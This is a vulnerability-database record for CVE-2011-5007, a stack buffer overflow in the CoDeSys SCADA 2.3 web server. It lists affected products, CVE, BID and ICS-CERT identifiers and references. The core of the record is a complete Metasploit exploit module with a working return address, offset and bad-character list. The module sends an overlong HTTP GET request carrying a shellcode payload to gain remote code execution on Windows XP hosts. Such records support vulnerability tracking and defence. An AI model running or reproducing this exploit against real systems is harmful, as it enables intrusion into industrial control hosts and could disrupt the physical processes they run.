ID

VAR-E-201111-0009


CVE

cve_id:CVE-2011-5007

Trust: 1.9

cve_id:CVE-2011-5009

Trust: 0.3

cve_id:CVE-2011-5008

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 18240 // EDBNET: 40679

EDB ID

18240


TITLE

CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18240

DESCRIPTION

CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit). CVE-2011-5007CVE-77387 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 18240

AFFECTED PRODUCTS

vendor:codesysmodel:scadascope:eqversion:2.3

Trust: 1.6

vendor:3s smartmodel:codesys sp4 patchscope:eqversion:3.42

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:3.4

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:2.3

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:3.5

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:2.3.9.32

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 18240 // EDBNET: 40679

EXPLOIT

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow',
'Description' => %q{
This module exploits a remote stack buffer overflow vulnerability in
3S-Smart Software Solutions product CoDeSys Scada Web Server Version 1.1.9.9.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Celil UNUVER', # Original discovery and exploit
'TecR0c', # Module Metasploit
'sinn3r'
],
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Payload' =>
{
'size' => 4000,
'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e",
},

'Targets' =>
[
[
'Windows XP SP3',
{
'Ret' => 0x7E4456F7,
'Offset' => 775
}
], # jmp esp user32
],
'Privileged' => false,
'DisclosureDate' => 'Dec 02 2011',
'DefaultTarget' => 0))

register_options([Opt::RPORT(8080)], self.class)
end

def check
connect
sock.put("GET / HTTP/1.1\r\n\r\n")
res = sock.get(-1, 3)
disconnect

# Can't flag the web server as vulnerable, because it doesn't
# give us a version
vprint_line(res)
if res =~ /3S_WebServer/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end

def exploit
connect

buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << make_nops(8)
buffer << payload.encoded

sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

print_status("Trying target #{target.name}...")
sock.put(sploit)
res = sock.recv(1024)
print_line(res)

handler
disconnect
end
end

=begin
target.ret verified on:
- Win XP SP3 unpatched
- Win XP SP3 fully-patched
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed
=end

Trust: 1.0

sources: EXPLOIT-DB: 18240

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 18240

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18240

TYPE

WebServer Stack Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 18240

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

sources: EXPLOIT-DB: 18240

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 18240

EXTERNAL IDS

db:NVDid:CVE-2011-5007

Trust: 1.9

db:ICS CERT ALERTid:ICS-ALERT-11-336-01A

Trust: 1.6

db:EXPLOIT-DBid:18240

Trust: 1.6

db:ICS CERTid:ICSA-12-006-01

Trust: 0.6

db:EDBNETid:40679

Trust: 0.6

db:NVDid:CVE-2011-5009

Trust: 0.3

db:BIDid:50854

Trust: 0.3

db:NVDid:CVE-2011-5008

Trust: 0.3

db:BIDid:50849

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 18240 // EDBNET: 40679

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-5007

Trust: 1.6

url:http://www.3s-software.com/index.shtml?en_codesysv3_en

Trust: 0.6

url:http://aluigi.altervista.org/adv/codesys_1-adv.txt

Trust: 0.6

url:http://www.us-cert.gov/control_systems/pdf/icsa-12-006-01.pdf

Trust: 0.6

url:https://www.exploit-db.com/exploits/18240/

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 18240 // EDBNET: 40679

SOURCES

db:BIDid:50854
db:BIDid:50849
db:EXPLOIT-DBid:18240
db:EDBNETid:40679

LAST UPDATE DATE

2022-07-27T09:12:24.941000+00:00


SOURCES UPDATE DATE

db:BIDid:50854date:2012-01-10T20:00:00
db:BIDid:50849date:2012-11-15T23:10:00

SOURCES RELEASE DATE

db:BIDid:50854date:2011-11-30T00:00:00
db:BIDid:50849date:2011-11-29T00:00:00
db:EXPLOIT-DBid:18240date:2011-12-13T00:00:00
db:EDBNETid:40679date:2011-12-13T00:00:00